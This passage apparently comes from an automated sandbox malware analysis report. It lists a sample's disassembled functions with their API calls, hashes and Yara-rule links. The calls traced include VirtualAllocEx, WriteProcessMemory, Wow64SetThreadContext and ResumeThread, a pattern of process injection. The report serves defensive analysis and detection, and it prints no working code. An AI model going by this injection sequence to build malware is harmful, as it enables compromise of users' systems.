                                        • Instruction Fuzzy Hash: 4A2126B1E006188BEB18CFAAD8443CEFBB7AFC9350F14C06AD808A6258DB341955CF90
                                        Function 0A13B478 Relevance: 3.1, APIs: 2, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 890 a13b478-a13b47c 891 a13b40e-a13b417 890->891 892 a13b47e-a13b4cb 890->892 895 a13b3c3-a13b409 891->895 896 a13b419-a13b41f 891->896 897 a13b4db-a13b50b Wow64SetThreadContext 892->897 898 a13b4cd-a13b4d9 892->898 895->891 899 a13b421-a13b424 896->899 900 a13b425-a13b43f ResumeThread 896->900 902 a13b514-a13b544 897->902 903 a13b50d-a13b513 897->903 898->897 899->900 905 a13b441-a13b447 900->905 906 a13b448-a13b46d 900->906 903->902 905->906
                                        APIs
                                        • ResumeThread.KERNELBASE ref: 0A13B432
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A13B4FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Thread$ContextResumeWow64
                                        • String ID:
                                        • API String ID: 1826235168-0
                                        • Opcode ID: 59ce6d4c61c33d8740719186d665b2b39000c907395e4ffef1e78c233a0a96ba
                                        • Instruction ID: a89cbeb8908a9d334b9f2c995f557368eadf3b2cd87bdb93ef4b7247979f2da7
                                        • Opcode Fuzzy Hash: 59ce6d4c61c33d8740719186d665b2b39000c907395e4ffef1e78c233a0a96ba
                                        • Instruction Fuzzy Hash: 1B4189B2C042498FCB10DFA9C4457EEBFF4EF49314F24845AC459A7241D738A946CFA1
                                        Function 0A13B894 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A13BAD6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: cbc1af1a2377f318f5f86cb45952200f6fc1623ee52764ed5d41c0c0b25cc555
                                        • Instruction ID: 55934d26cd06d582c4cc5db47fe577034470e63d7cdccc70ed2beac0fee8b470
                                        • Opcode Fuzzy Hash: cbc1af1a2377f318f5f86cb45952200f6fc1623ee52764ed5d41c0c0b25cc555
                                        • Instruction Fuzzy Hash: 4CA1AC72D18619CFDF20CFA8C9517EDBBB2BF48314F1481AAD809A7244EB749981CF91
                                        Function 0A13B8A0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A13BAD6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 71a78bc00016e78575ab1a2ea1cba68e50be2cd381528226fb46e53d7c9c7b2e
                                        • Instruction ID: d3a0384b7e69d095227fffaee0565f6ed0e7e910354e86ee2f67fb562574eb3a
                                        • Opcode Fuzzy Hash: 71a78bc00016e78575ab1a2ea1cba68e50be2cd381528226fb46e53d7c9c7b2e
                                        • Instruction Fuzzy Hash: 56917C72D18619CFDF20CF68C951BEDBBB2BF48314F1481AAD809A7244EB749985CF91
                                        Function 056FB088 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 056FB2DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 27be53e29bd1916a14d87e906346289eb2bebc3f71a3b69e98a324d32a72e2cf
                                        • Instruction ID: fc4e954479e97fd31b5b6ab8fa38fd9ba81b04a19086da986a4ff59953965ded
                                        • Opcode Fuzzy Hash: 27be53e29bd1916a14d87e906346289eb2bebc3f71a3b69e98a324d32a72e2cf
                                        • Instruction Fuzzy Hash: 6C812170A00B058FDB24DF2AD444B6ABBF6FF88200F10892DD59A97B60DB75E845CB91
                                        Function 05801264 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05804381
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: b435a0bff4d07eed87c79900c2ebd06032e19c8d2286dca93d7295d80b2349c2
                                        • Instruction ID: 046de4fb3058ef1576d37fde693525b2d976ab38772d08ac6b8629932afe7f55
                                        • Opcode Fuzzy Hash: b435a0bff4d07eed87c79900c2ebd06032e19c8d2286dca93d7295d80b2349c2
                                        • Instruction Fuzzy Hash: 894128B49002099FCB54DF99C848EAAFBF6FF88314F25D459DA19A7361D374A841CBA0
                                        Function 056F4528 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 056F5DE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 50b9477901d18269262c753272f8a0ab314b5dde7e810c680dd24025407956bd
                                        • Instruction ID: ae877eb555e11edab8e1514ac5a1650011aadf650e112d860143285fccd380b9
                                        • Opcode Fuzzy Hash: 50b9477901d18269262c753272f8a0ab314b5dde7e810c680dd24025407956bd
                                        • Instruction Fuzzy Hash: AE41F0B0C00719CFDB24DFA9C844B9EBBB5FF48704F20806AD519AB255DB756946CF90
                                        Function 056F5D2C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 056F5DE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 26a33bd07013639459e7d9bbc20cda71f51c3c20ce842e66ccccbdb0d4499a10
                                        • Instruction ID: 2441a50cc6a4b498b766a8d8754579e9ec81a3d6d539d2d78af026a39175c85d
                                        • Opcode Fuzzy Hash: 26a33bd07013639459e7d9bbc20cda71f51c3c20ce842e66ccccbdb0d4499a10
                                        • Instruction Fuzzy Hash: 91410FB0C00619CEDB28CFA9C884BDEFBB1BF48304F20806AD419AB255DB756946CF90
                                        Function 058081F1 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e7e0e2c28e2b0a61168d2c6ae9d4cd98790c774cb1ce3cd70446f2e6ae1b608
                                        • Instruction ID: 16121147aa78612e52adca4a7e0ab3018ff3ff0a1080abc47b2c8ac0541f5bff
                                        • Opcode Fuzzy Hash: 3e7e0e2c28e2b0a61168d2c6ae9d4cd98790c774cb1ce3cd70446f2e6ae1b608
                                        • Instruction Fuzzy Hash: E621F671904B848FCB61CBA8D9097EABFF0FF45324F14545AD849D3291C379A988CF91
                                        Function 0A13B612 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A13B6A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: cfddabb67ecf66d5771daaae6ef03e0cc0789ad0fab924befb481a952aa7c2ea
                                        • Instruction ID: de49445e8f93fa77fdd12d708cb572fb853081d0a83a70680150b8e934781536
                                        • Opcode Fuzzy Hash: cfddabb67ecf66d5771daaae6ef03e0cc0789ad0fab924befb481a952aa7c2ea
                                        • Instruction Fuzzy Hash: 502148B19002499FDB10DFAAC885BEEBFF1FF48310F10842AE959A7241D7789945CBA0
                                        Function 0A13B618 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A13B6A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 6ab81402eb63e1e95c185e6041ea064a2501741469f9835c710b6ef80d78297c
                                        • Instruction ID: b6a9044739d23b6884e78c520dd1410bfcfc77e30f82283daa84c7422139f62d
                                        • Opcode Fuzzy Hash: 6ab81402eb63e1e95c185e6041ea064a2501741469f9835c710b6ef80d78297c
                                        • Instruction Fuzzy Hash: B3212AB19003499FDB10DFAAC985BDEBBF5FF48310F108429E919A7241D7789945CFA4
                                        Function 056FAF74 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,056FD52E,?,?,?,?,?), ref: 056FD5EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: b42a398bef68380d5cb683b9a039e5381ab49c27241388ad289802ad9bbba560
                                        • Instruction ID: decd78a1e87fa2a381d9d685b78f630b8d433142953b8cf473a875673d8a2999
                                        • Opcode Fuzzy Hash: b42a398bef68380d5cb683b9a039e5381ab49c27241388ad289802ad9bbba560
                                        • Instruction Fuzzy Hash: 4121E4B5D002489FDB10CF9AD984AEEBFF9FB48314F14841AE918A7350D378A940CFA5
                                        Function 0A13B702 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A13B788
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 68f8d86e487623e7591012743c7375a8b630ff27f11e928e9635b2c17a45fbb4
                                        • Instruction ID: b26c64a99e2ede64ef6ce4c1062edb3148c4023ead1582449ee32479537747b8
                                        • Opcode Fuzzy Hash: 68f8d86e487623e7591012743c7375a8b630ff27f11e928e9635b2c17a45fbb4
                                        • Instruction Fuzzy Hash: 942114B19002499FDB10DFAAC885AEEFBF5FF48310F14842AE959A7250D7789945CFA0
                                        Function 056FD560 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,056FD52E,?,?,?,?,?), ref: 056FD5EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 39909db479e04bb8109d53457c6551777a2b65cd27223dbf5ecbe121c2a120cd
                                        • Instruction ID: da4a5c0ff9e241c86e6e39dfd98fe3f8e99825183217fa6d33e3145d142c6018
                                        • Opcode Fuzzy Hash: 39909db479e04bb8109d53457c6551777a2b65cd27223dbf5ecbe121c2a120cd
                                        • Instruction Fuzzy Hash: AF21E3B5D00248AFDB10CF9AD984ADEBBF9FB48310F14801AE918A3350D379A944CFA5
                                        Function 0A13B708 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A13B788
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 205dd7baf07d298b564195217e06618347f1d5a821d25e98c4b38bffe059e2ad
                                        • Instruction ID: c919402adb990e7aa9a0a0d651b6e3a7276f66cea6a894010d56a6c1d7e94e9e
                                        • Opcode Fuzzy Hash: 205dd7baf07d298b564195217e06618347f1d5a821d25e98c4b38bffe059e2ad
                                        • Instruction Fuzzy Hash: A42125B18003499FCB10DFAAC881AEEFBF5FF48310F10842AE559A7240D778A945CFA1
                                        Function 0A13B480 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A13B4FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 13bf206a917e20b774b5c286601776dec24eec54120f5c7ab6159d0eebe13fa4
                                        • Instruction ID: 510b9f2c985bf7f546559d596af131562ccc6324c42b670b704002be83301ecf
                                        • Opcode Fuzzy Hash: 13bf206a917e20b774b5c286601776dec24eec54120f5c7ab6159d0eebe13fa4
                                        • Instruction Fuzzy Hash: CB2147B2D043098FDB10DFAAC4857EEBBF4EF88314F14842AD519A7240DB78A945CFA5
                                        Function 0A13B3C8 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 8d8b20215b4ea41fb64e51ba8b023e71d7698981e70aa86beed1126e2e589bbb
                                        • Instruction ID: b601153707eab62be5fbdf9daae1deadf7eaec2529459d5d2abd70a5c55e3d28
                                        • Opcode Fuzzy Hash: 8d8b20215b4ea41fb64e51ba8b023e71d7698981e70aa86beed1126e2e589bbb
                                        • Instruction Fuzzy Hash: AD1179B2C042488BCB20DFA9C5457EEFBF4EF48324F24845AC519B7200D738A941CFA4
                                        Function 056FAD98 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056FB359,00000800,00000000,00000000), ref: 056FB56A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 7f01ffa745681974a4218dd7d82c9c682fc81d33d83833873643a47d1eb51199
                                        • Instruction ID: f96a9aabbe206a5e68dbb9292223595ac7fba5996c131e85a13732e2bf8ae223
                                        • Opcode Fuzzy Hash: 7f01ffa745681974a4218dd7d82c9c682fc81d33d83833873643a47d1eb51199
                                        • Instruction Fuzzy Hash: E51112B6C042099FDB10DF9AC444AAEFBF5FB48710F14842AE919A7610C379A545CFA5
                                        Function 0A13B550 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A13B5C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 4506d4cdd128edd9bcc5a05848f49fc3723e1dd17c1fabc1e75d86d8d0fc7d12
                                        • Instruction ID: 4f34a0826abefc2bbfe13c1bd63424838b4e946ac5a87d05b817463adc9166df
                                        • Opcode Fuzzy Hash: 4506d4cdd128edd9bcc5a05848f49fc3723e1dd17c1fabc1e75d86d8d0fc7d12
                                        • Instruction Fuzzy Hash: 331156B68002498FDB10DFAAC945BEEBBF5EF48310F208819E519A7250C739A941CFA0
                                        Function 0A13B558 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A13B5C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: fb8df334313c445464007771fb4fc4beec293d918df964454bbc09839337a7d9
                                        • Instruction ID: 4409c98cacdb3c1f0c4ae9077418556b5d2c75f6297db1211b7d7a938ba3c822
                                        • Opcode Fuzzy Hash: fb8df334313c445464007771fb4fc4beec293d918df964454bbc09839337a7d9
                                        • Instruction Fuzzy Hash: 551137728002499FCB10DFAAC844AEEBFF5EF48310F208419E519A7250CB79A541CFA1
                                        Function 056FB4FB Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056FB359,00000800,00000000,00000000), ref: 056FB56A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 8ffac1d2b8472dd394bb15ee41804514825095c2c8f3e45aa5123d544dc44216
                                        • Instruction ID: 82af38554ea2b3b4b7437832c80d933a689e2aad89b9a5c6239a4220eda0c647
                                        • Opcode Fuzzy Hash: 8ffac1d2b8472dd394bb15ee41804514825095c2c8f3e45aa5123d544dc44216
                                        • Instruction Fuzzy Hash: A31112B6C002099FDB10CF9AC444A9EFBF4FB88710F14842AD519A7610C379A545CFA5
                                        Function 0A13B3D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 474f727ac9565579de7da4da01235e33d5104c40685ee617e3aea76f16aad6ae
                                        • Instruction ID: ff843d04d44c1c662fde1e85173d17c0473a7c13dc4849a9a97d2eb6bba1a30e
                                        • Opcode Fuzzy Hash: 474f727ac9565579de7da4da01235e33d5104c40685ee617e3aea76f16aad6ae
                                        • Instruction Fuzzy Hash: 471155B18002488BCB20DFAAC4447EEFBF4EF88324F208419C519A7240CB78A941CFA5
                                        Function 0A13DFA0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A13FDB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 2772885670705ce588c58dd151ab667868b7d0eb6a0cc8a0af5c42c1d26598b8
                                        • Instruction ID: 2f74de3c2a4775a4b1a480220bd94fef3fe1fb043354288c17d47201c4f99700
                                        • Opcode Fuzzy Hash: 2772885670705ce588c58dd151ab667868b7d0eb6a0cc8a0af5c42c1d26598b8
                                        • Instruction Fuzzy Hash: 1811F2B68003499FDB10DF9AC588BEEBBF8EB58710F10841AE518B7300D379A944CFA1
                                        Function 056FB278 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 056FB2DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: b1551bb46ec61783725839f12b7fb503f4518da1dc1c4ad6de88b382792491d5
                                        • Instruction ID: f5411a9d4ea49f9e12c11ca86616df9c01b375a190bc53c3f6d614cd7e72cb49
                                        • Opcode Fuzzy Hash: b1551bb46ec61783725839f12b7fb503f4518da1dc1c4ad6de88b382792491d5
                                        • Instruction Fuzzy Hash: 6111E0B5C002498FDB20DF9AC444ADEFBF4EF88724F10841AD529B7610D379A545CFA5
                                        Function 05807C64 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 058082C5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 83ffc3b4c9bcfbc5a24896eaa56728580e2e6c2c027cad4ef228def1c629d09f
                                        • Instruction ID: d9c9c3a895e3abad46cf3405c3a50abe6421ca298cab7d846025b40198107075
                                        • Opcode Fuzzy Hash: 83ffc3b4c9bcfbc5a24896eaa56728580e2e6c2c027cad4ef228def1c629d09f
                                        • Instruction Fuzzy Hash: 2B1115B19007488FCB20DF9EC844B9EBFF4EB48324F208459D519A7240D378A984CFA5
                                        Function 0A13FD50 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A13FDB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: b2a08a884fcd9c8a2481353e206023c297575a151e16b66b476ee1135cfff05b
                                        • Instruction ID: 1acfd8abc6022c7484fc1d4d9778856dd6d5c3b776a3de1e1771fb426207ffa6
                                        • Opcode Fuzzy Hash: b2a08a884fcd9c8a2481353e206023c297575a151e16b66b476ee1135cfff05b
                                        • Instruction Fuzzy Hash: D31125B58002498FCB10CF99C448BDEBFF4EB49324F14844AE558B7241C378A544CFA0
                                        Function 05808268 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 058082C5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 62b017712202ced4203ed6e7e14cabb77283ddecebdbfb91ed30de6c3f5d9261
                                        • Instruction ID: 15a69a123536e8a74a8d44d0a3dbfbdd5f05e6e82bb577cc9173d7006e2aa0ba
                                        • Opcode Fuzzy Hash: 62b017712202ced4203ed6e7e14cabb77283ddecebdbfb91ed30de6c3f5d9261
                                        • Instruction Fuzzy Hash: A51115B58007489FCB20DF9AD949BDEFFF4EB48324F208459D558A3240D378A984CFA5
                                        Function 077DC144 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 366f24ca94fd077963de0dae8bbb6f7416a79f68e2dfdc4591a35ad6aec067f9
                                        • Instruction ID: a2285430e1802c2c4ace6619b8dbc5197c5b60dec5fd9f68074e50f5e3f45b14
                                        • Opcode Fuzzy Hash: 366f24ca94fd077963de0dae8bbb6f7416a79f68e2dfdc4591a35ad6aec067f9
                                        • Instruction Fuzzy Hash: 5F51AE71B002069FCB14DFB998489AEBBBAFFC5250B148929E869DB354EF309D058790
                                        Function 077DCAA7 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: V
                                        • API String ID: 0-1342839628
                                        • Opcode ID: a411d2152a029b9d162fcb1efa7a05b121c381f52c311d051da2105a3b34788c
                                        • Instruction ID: 43b8a7bf0d856b67512d47a0962353730e0bbb20cc3ecaf56be142e15fde9ca3
                                        • Opcode Fuzzy Hash: a411d2152a029b9d162fcb1efa7a05b121c381f52c311d051da2105a3b34788c
                                        • Instruction Fuzzy Hash: 5D517DB0914209CFEF16CF59C6407BDBBB2AF86345F088866E566DB285C7758D40CB71
                                        Function 077DC057 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
